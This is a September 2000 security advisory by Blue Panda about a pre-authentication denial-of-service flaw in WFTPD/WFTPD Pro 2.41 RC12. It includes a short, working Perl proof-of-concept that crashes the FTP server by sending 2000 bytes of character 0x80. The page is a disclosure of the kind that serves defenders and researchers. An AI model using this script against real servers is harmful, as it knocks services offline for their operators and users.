[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12

Title: Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
Released by: Blue Panda
Date: 5th September 2000
Printable version: Click here
=================================================================

Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12

05/09/2000 (dd/mm/yyyy)



bluepanda@dwarf.box.sk

http://bluepanda.box.sk/

=================================================================



Problem: WFTPD will crash if a large string consisting of characters 128-255

is received. A valid user/pass combination is not required to take advantage

of this flaw.



Vulnerable: WFTPD/WFTPD Pro 2.41 RC12 and prior.

Immune: WFTPD/WFTPD Pro 2.41 RC13.



Vendor status: Notified. A fix has been released.



===================

Proof of concept:

===================



#!/usr/bin/perl

#

# WFTPD/WFTPD Pro 2.41 RC12 denial-of-service

# Blue Panda - bluepanda@dwarf.box.sk

# http://bluepanda.box.sk/

#

# ----------------------------------------------------------

# Disclaimer: this file is intended as proof of concept, and

# is not intended to be used for illegal purposes. I accept

# no responsibility for damage incurred by the use of it.

# ----------------------------------------------------------

#

# Sends WFTPD string consisting of characters > 127, causing it to crash.

#



use IO::Socket;



$host = "ftp.host.com" ;

$port = "21";

$sleepfor = 4;



print "Connecting to $host:$port...";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";

print "done.\n";



$buffer = "\x80" x 2000;



print $socket "$buffer\n";

$counter = 0;

print "Sleeping for $sleepfor seconds.";

while($counter < $sleepfor) {

        sleep(1);

        print ".";

        $counter += 1;

}

print "\n";



close($socket);








(C) 1999-2000 All rights reserved.